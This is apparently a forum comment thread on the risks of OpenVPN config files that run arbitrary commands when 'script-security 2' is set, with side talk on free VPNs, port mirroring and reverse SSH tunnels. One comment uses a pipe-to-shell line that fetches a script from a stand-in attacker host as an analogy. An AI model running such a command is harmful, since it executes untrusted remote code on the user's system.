The other answer if course is that piping all your internet traffic through a single 3rd party has some obvious consequences: surveillance and traffic injection being the obvious ones. If anyone thinks they use TLS extensively; run a Bro packet analyzer off a cheap switch span port for a month on your upstream router and prepare to be surprised.
whilst I somewhat agree, the original SO question was specifically about free VPN providers.
I pay my ISP a significant amount each month, and I expect in return that they’re at least not going to inject extra JavaScript into all my browsing. A free VPN on the other hand? They’ve gotta make money, I’ll be things get shady real fast.
Yes. For UniFi, in the properties of the switch, go to Ports and click on the edit button for the port that should become the mirror. Then click "+" next to Profile Overrides. Under Operation, select Mirroring. Type the port number that should be mirrored and Save. I did this with a UniFi Switch 8 POE-150W.
The long and short is that OpenVPN has a way to execute arbitrary system commands at whatever privileges the OpenVPN daemon has (usually pretty high) via a config file.
Treat OpenVPN config files the same way you'd treat a bash script you pulled from the net and were thinking of running as root. IE: read the damn thing first.
That's a good example of why permissions should be opt-in, not opt-out.
I recently developed an ElasticSearch plugin and I was positively surprised at the security model: plugins have to declare the permissions they intend to use and the user has to explicitly grant them when installing the plugin.
> Elasticsearch was never meant to be wide-open to internet users. Elastic, the company behind Elasticsearch, explained all this in 2013. This post is filled with such red-letter warnings as "Elasticsearch has no concept of a user." Essentially, anyone that can send arbitrary requests to your cluster is a "super user."
Ahem. "NOTE: the current — script-security setting may allow this configuration to call user-defined scripts"
By setting "script-security 2" in the config file, you are opting in to arbitrary script execution, and the binary even helpfully warns you about it. This doesn't happen by default.
(Of course, you could say "well it was already in the config, I didn't put it there", but that's akin to "curl evil.example.com/pwnme.sh | bash # I didn't inspect the file, not my problem what it contains")
I think in general reverse SSH tunnels can be extremely risky and very handy.
I've emailed friends scripts with ssh keys that were: "Click and open a tunnel to my server", I could then help them (i.e. to save images from their raspberry pi camera directly to webdav. Or I could work on friend's raspberry pi proximity sensor in his water tank...) Very handy, very risky.
Also since you're creating a tunnel, you should make sure your end is firewalled correctly from the incomming connections from the other side. Especially if you're a dev type and may run local services on all interfaces mindlessly or whatever.
Windows should detect a new network and should ask you about the network's security level (public, private, domain), thus applying different firewall rule-sets.
Not sure if other macOS or some Linux distro has anything similar.
Excellent article. Sounds like the devs of OpenVPN have not implemented a proper interface and have instead opted to include a catch all command to be as flexible as possible. The longer this is in place the harder it will be to remove - perhaps it's too late. Nuget made the same blunder with their ability to execute scripts on package install. Now disabled by default. VideoLAN (VLC) allowed subtitles to become so complex that there were security problems there too.
A text file used for configuration should not be an executable.
Networking is complex and requires flexibility. Executing arbitrary shell commands to set up interfaces is useful. Why should I suffer because people might use a malicious configuration file? If you're in that situation then you're doing it wrong.
Every VPN client I know of lets you run arbitrary scripts on events like up/down/etc. There are to many possible ways to setup a network connection to cover all the bases as options. I can't imagine a 'proper interface' that would be flexible enough.
I just finished doing some install automation with Ansible of the ProtonVPN ovpn configs and I’m happy to report that these settings were not in there.
Not very surprising. I'd imagine it not being very common to find ovpn configs that both allow user-defined scripts and not require any authentication. This post should be a warning for any VPN services that -don't- let you look at the configs you're using.
I think some of the free VPN services may hardcode/import a configuration so your settings areessentially baked in. Your only option is to start and stop the VPN, and maybe change the server location.
